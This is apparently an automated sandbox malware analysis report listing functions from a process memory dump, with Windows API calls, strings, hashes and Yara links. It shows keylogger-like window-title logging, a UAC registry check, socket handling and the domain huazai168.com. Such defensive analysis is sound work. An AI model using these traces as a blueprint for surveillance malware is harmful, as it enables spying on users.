RtlGetNtVersionNumbers, xrefs: 0629764E
ntdll.dll, xrefs: 0629763B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlGetNtVersionNumbers$ntdll.dll
API String ID: 145871493-1263206204
Opcode ID: 5a5047ef7f8340a9753a754632ea9f6a2970829cae0fff05387704604db21d10
Instruction ID: 7b1ed200cb5d02fe61f73a171e90d3aefbf74bacbe4dab8816313612863ecb87
Opcode Fuzzy Hash: 5a5047ef7f8340a9753a754632ea9f6a2970829cae0fff05387704604db21d10
Instruction Fuzzy Hash: A1E065322203236796611F55BC4DA9B7A75DBC1F91F164019FD4092100C674DC46DA62

Function 06293AE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26sleepmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,0000046D,?,062920A0,?,00000000,00000000,?), ref: 06293AF1
LocalSize.KERNEL32(00000000), ref: 06293B17
Sleep.KERNEL32(00000001,00000000,00000000), ref: 06293B2A
LocalFree.KERNEL32(00000000), ref: 06293B31

Strings

huazai168.com, xrefs: 06293B05

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Local$AllocFreeSizeSleep
String ID: huazai168.com
API String ID: 1864957939-2241639779
Opcode ID: 2c6cd8581b04b2746758e8198ce92267debacf806b6cf9b39b43c865d44909fa
Instruction ID: 350047b093cb1dd9dc89722a4f5dc3dffd37dbd227ab865656f66311f1de73d5
Opcode Fuzzy Hash: 2c6cd8581b04b2746758e8198ce92267debacf806b6cf9b39b43c865d44909fa
Instruction Fuzzy Hash: ACE02272A01B237BE2906B20BC0DFDE7A99AF49760F040104FF84A1180EB9090418AB7

Function 062974A9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,?,062979AA,?,?,?), ref: 062974B8
GetProcAddress.KERNEL32(00000000), ref: 062974BF
GetCurrentProcess.KERNEL32(00000000,?,?,062979AA,?,?), ref: 062974D3

Strings

IsWow64Process, xrefs: 062974AE
kernel32.dll, xrefs: 062974B3

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: 0fd0b9859d6b03fabefa74a74a850b205d8ca762e2ff10b1ea5af7e2362e3955
Instruction ID: efbeb9bfc31b9bc1fdbc711a44dc0b7c854c9fa1d1300559d5605479fe6b4e36
Opcode Fuzzy Hash: 0fd0b9859d6b03fabefa74a74a850b205d8ca762e2ff10b1ea5af7e2362e3955
Instruction Fuzzy Hash: 58E01272D21316FFDF519BA4A90D99E7ABDEF44791B010051FD41E3000E6B4DA009FA1

Function 06291B34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06291B85), ref: 06291B47
GetProcAddress.KERNEL32(00000000), ref: 06291B4E
GetCurrentProcess.KERNEL32(00000000,?,?,?,06291B85), ref: 06291B5E

Strings

kernel32, xrefs: 06291B42
IsWow64Process, xrefs: 06291B3D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32
API String ID: 4190356694-3789238822
Opcode ID: 842b04ac0e3ed73b78fd39ccfceaba59d398c7dce1695133cbed3d426133d5ae
Instruction ID: 771ac4c6dc4ea598981a058b68d6490cba4cfd2aaeadee463db7b52250a33c6c
Opcode Fuzzy Hash: 842b04ac0e3ed73b78fd39ccfceaba59d398c7dce1695133cbed3d426133d5ae
Instruction Fuzzy Hash: 3EE08C72C1131ABBDF10ABE4AC0EACE7BACDF447A1B010040BE01E3100D7B4DA00EBA0

Function 062A0312 Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 062A0370
GetFileType.KERNEL32(00000480), ref: 062A041B
GetStdHandle.KERNEL32(-000000F6), ref: 062A047E
GetFileType.KERNEL32(00000000), ref: 062A048C
SetHandleCount.KERNEL32 ref: 062A04C3

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 4d196301d7835e4c8aa03cb52c7f0e0a79495e605f0e22deb4ac269f116c2c1f
Instruction ID: e7a7454f0acaa6b2dbf378ddbc05b1e685400463b358b7767a20b3a2de747a7e
Opcode Fuzzy Hash: 4d196301d7835e4c8aa03cb52c7f0e0a79495e605f0e22deb4ac269f116c2c1f
Instruction Fuzzy Hash: E75108319203028FD7A08F68D888B697BE1FB5233CF15866CCEE69B2D1D7B49845DB51

Function 06297DC3 Relevance: 7.6, APIs: 6, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00002000,00000004,00000000,?,?,?,?,?,062936CC,?,?,?,062920F0,?), ref: 06297DFE
VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,062936CC,?,?,?,062920F0,?,062C2BD8,?,00000000), ref: 06297E0E
GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,062936CC,?,?,?,062920F0,?,062C2BD8,?,00000000,00000000,?), ref: 06297E1F
HeapAlloc.KERNEL32(00000000,?,?,?,062936CC,?,?,?,062920F0,?,062C2BD8,?,00000000,00000000,?,?), ref: 06297E26
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,062936CC,?,?,?,062920F0,?,062C2BD8,?,00000000), ref: 06297E4A
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,062936CC,?,?,?,062920F0,?,062C2BD8,?,00000000), ref: 06297E59

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Alloc$Virtual$Heap$Process
String ID:
API String ID: 2020977634-0
Opcode ID: e433a94684b66f7cfd40717d86575a2f3c7323ec26b16e9af11795c9c8badec3
Instruction ID: ce49cfb6446a0d449ea7b3f7cfbdf5fff854e330a91545fbab72249542d30099
Opcode Fuzzy Hash: e433a94684b66f7cfd40717d86575a2f3c7323ec26b16e9af11795c9c8badec3
Instruction Fuzzy Hash: 5E315171A20306AFDB649F69CC85E6B77A8FF48754F140419FA45D7280D7B0ED408B64

Function 06292B0D Relevance: 7.6, APIs: 5, Instructions: 80stringtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00000000,00000258), ref: 06292B2F
GetWindowTextA.USER32(00000000,062C20CC,00000400), ref: 06292B3D
lstrlenA.KERNEL32(062C20CC), ref: 06292B73
GetLocalTime.KERNEL32(?), ref: 06292B81
wsprintfA.USER32 ref: 06292BB2

Part of subcall function 06292A59: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06292A71
Part of subcall function 06292A59: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06292AC4
Part of subcall function 06292A59: GetFileSize.KERNEL32(00000000,00000000), ref: 06292AD1
Part of subcall function 06292A59: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06292AE3
Part of subcall function 06292A59: lstrlenA.KERNEL32(06292DCE,?,00000000), ref: 06292AF1
Part of subcall function 06292A59: WriteFile.KERNEL32(00000000,06292DCE,00000000), ref: 06292AFC
Part of subcall function 06292A59: CloseHandle.KERNEL32(00000000), ref: 06292B03

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Windowlstrlen$CloseCreateFolderForegroundHandleLocalPathPointerSizeSpecialTextTimeWritewsprintf
String ID:
API String ID: 3540613261-0
Opcode ID: 2e53e34f37e6c4e223bc76ecbec0f787185353a7371574460e3e22d0bb3a18a5
Instruction ID: 6655cbee3a2774343aa318edfaade037b1e53896dbdc84a48dc5178150323339
Opcode Fuzzy Hash: 2e53e34f37e6c4e223bc76ecbec0f787185353a7371574460e3e22d0bb3a18a5
Instruction Fuzzy Hash: 152190B2C11219BBDB509BA9EC08FEF77BCEB88315F000061FA44E2041E6788B81DB75

Function 06297681 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,06297870,00000000,00020019,06297870,00000000,0000009C,00000000,?,?,06297870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 0629769D
RegQueryValueExA.ADVAPI32(06297870,?,00000000,80000002,00000000,?,?,?,06297870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062976BD
RegQueryValueExA.ADVAPI32(06297870,?,00000000,00000000,00000000,?,?,?,06297870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062976E2
RegCloseKey.ADVAPI32(06297870,?,?,06297870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062976F3
RegCloseKey.ADVAPI32(06297870,?,?,06297870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06297700

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseQueryValue$Open
String ID:
API String ID: 4082589901-0
Opcode ID: d1515b86825201747f8fe1444180c6ab26f587db96478537760f0556c15e3db6
Instruction ID: 2b4da34200c1ab9f7875ec3c9f9af9d53bf8dc1b4135114f414d16d5eec0c398
Opcode Fuzzy Hash: d1515b86825201747f8fe1444180c6ab26f587db96478537760f0556c15e3db6
Instruction Fuzzy Hash: D811257552020ABFDF118F55EC48DAF3BBAEF89350B104069FD14A6120DB71AA11EB70

Function 062A9DEB Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 062A9DF0
GetClassInfoA.USER32(?,?,?), ref: 062A9E0B
RegisterClassA.USER32(00000004), ref: 062A9E16
lstrcatA.KERNEL32(00000034,?,00000001), ref: 062A9E4D
lstrcatA.KERNEL32(00000034,?), ref: 062A9E5B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: f4536cac4bff1db749460406db658d71bb9821bc97c4ac46d403bcb6db6bccda
Instruction ID: e60623c8e1861c6c48678ad4cd1ce15534ba2731d4652955b161d7945bb4172f
Opcode Fuzzy Hash: f4536cac4bff1db749460406db658d71bb9821bc97c4ac46d403bcb6db6bccda
Instruction Fuzzy Hash: 00110436A20345BFDB90AF749D00AEE7BB8EF05710F00451AEE96A7152C7F09641CBA1

Function 062913A5 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationnetworkCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 062913AA
WaitForSingleObject.KERNEL32(?,000000FF), ref: 062913CD
CloseHandle.KERNEL32(?), ref: 062913E9
CloseHandle.KERNEL32(?), ref: 062913EE
WSACleanup.WS2_32 ref: 062913F0

Part of subcall function 0629180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06291832
Part of subcall function 0629180D: CancelIo.KERNEL32(?,?,?,?,0629560D), ref: 0629183B
Part of subcall function 0629180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06291847
Part of subcall function 0629180D: closesocket.WS2_32(?), ref: 06291850
Part of subcall function 0629180D: SetEvent.KERNEL32(?,?,?,?,0629560D), ref: 06291859

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
String ID:
API String ID: 1476891362-0
Opcode ID: 103cf331ee354e5b7b9f2c375496f6f1a0be868c61d608eee821251b04caf5f7
Instruction ID: e7562df59efefb881ea29d3edc6a65ec14760249efb3717c80074e0a83b3480c
Opcode Fuzzy Hash: 103cf331ee354e5b7b9f2c375496f6f1a0be868c61d608eee821251b04caf5f7
Instruction Fuzzy Hash: 60010430421792DFCB65EF24DD0879DBBF4AF80360F10060CD8A2129D0CBB16A26DB61

Function 0629CDA1 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,0629DE63,0629DDE8,00000000,0629B401,00000000,00000000,00000000,?,06298D56,?,?,06298CE2,?,?), ref: 0629CDA3
TlsGetValue.KERNEL32(?,06298D56,?,?,06298CE2,?,?,?), ref: 0629CDB1
SetLastError.KERNEL32(00000000,?,06298D56,?,?,06298CE2,?,?,?), ref: 0629CDFD

Part of subcall function 062A005D: HeapAlloc.KERNEL32(00000008,06298D56,00000000,00000000,00000000,00000000,00000000,?,06298D56,?,?,06298CE2,?,?,?), ref: 062A0153

TlsSetValue.KERNEL32(00000000,?,06298D56,?,?,06298CE2,?,?,?), ref: 0629CDD5
GetCurrentThreadId.KERNEL32 ref: 0629CDE6

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: bdcf72b67e35dbfaee59e2515ce98f16f0c462ccabb2f09203d5156628565e54
Instruction ID: 508fd905761fa2052e27db7e5091107db0b7896bc235e6eb74b3649f886f0e3d
Opcode Fuzzy Hash: bdcf72b67e35dbfaee59e2515ce98f16f0c462ccabb2f09203d5156628565e54
Instruction Fuzzy Hash: 42F09C31B607225BDA713B74BC0C56A3E56EF817B1B024525FF95952C0CFA048029FB1

Function 0629CF88 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,?,?,0629CD75,0629B68C,0629B6E5,?,?,?), ref: 0629CFBC

Part of subcall function 0629B2B4: HeapFree.KERNEL32(00000000,00000000,00000000,06298D56,00000000,?,062A0113,00000009,00000000,00000000,00000000,00000000,00000000,?,06298D56,?), ref: 0629B388

DeleteCriticalSection.KERNEL32(?,?,0629CD75,0629B68C,0629B6E5,?,?,?), ref: 0629CFD7
DeleteCriticalSection.KERNEL32 ref: 0629CFDF
DeleteCriticalSection.KERNEL32 ref: 0629CFE7
DeleteCriticalSection.KERNEL32 ref: 0629CFEF

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection$FreeHeap
String ID:
API String ID: 447823528-0
Opcode ID: 177cfeb9226fbe0abd25d90151638c56390f88d4a64be237a2fb070715c78871
Instruction ID: c3f670a38ff5402fa166a9b0b524a44116f5f8954cd96b79cf00c290303b8d8b
Opcode Fuzzy Hash: 177cfeb9226fbe0abd25d90151638c56390f88d4a64be237a2fb070715c78871
Instruction Fuzzy Hash: 80F05E22E24EA5568EF43A1AFC4C8DD6A52DFD03E0317A03BDDE462070C5294C45CEA5

Function 0629180D Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06291832
CancelIo.KERNEL32(?,?,?,?,0629560D), ref: 0629183B
InterlockedExchange.KERNEL32(?,00000000), ref: 06291847
closesocket.WS2_32(?), ref: 06291850
SetEvent.KERNEL32(?,?,?,?,0629560D), ref: 06291859

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 3a6fe903ce6a36561c933f313c60e2725b3aab6672fa088bdb5281b9a0dac386
Instruction ID: f10575c066dcd40bbbd6cf8a3accee70976b00def33d338217047028a11ab2f5
Opcode Fuzzy Hash: 3a6fe903ce6a36561c933f313c60e2725b3aab6672fa088bdb5281b9a0dac386
Instruction Fuzzy Hash: 6FF0DA31400716EFDB209B95EC0EA9A7BB9FF04314F114568ABC2915E0DBF2A945AB50

Function 062ACAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 062ACACC
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 062ACB7B
LoadBitmapA.USER32(00000000,00007FE3), ref: 062ACB93

Strings

, xrefs: 062ACADB

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 06a1b0eab5edd23014024e156bd666fc7a4c27b0c48c3e70749f0148aef17f4a
Instruction ID: 566a03fa10cc7dccf2578242ac633c695bd5429910abd7f2154a2e27ecb8539c
Opcode Fuzzy Hash: 06a1b0eab5edd23014024e156bd666fc7a4c27b0c48c3e70749f0148aef17f4a
Instruction Fuzzy Hash: 15213771E00319AFEB10CB78DD88BAEBBB9EF40710F0546A5E945EB281D7B59645CF40

Function 00341F90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0034202F

Part of subcall function 00346F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,003411FC,?,?,?,?,003411FC,?,0036A814), ref: 00346F94

Strings

ios_base::failbit set, xrefs: 00341EC8, 00341FD1
ios_base::eofbit set, xrefs: 00341FD6
ios_base::badbit set, xrefs: 00341FC7, 00341FF2, 00342013

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
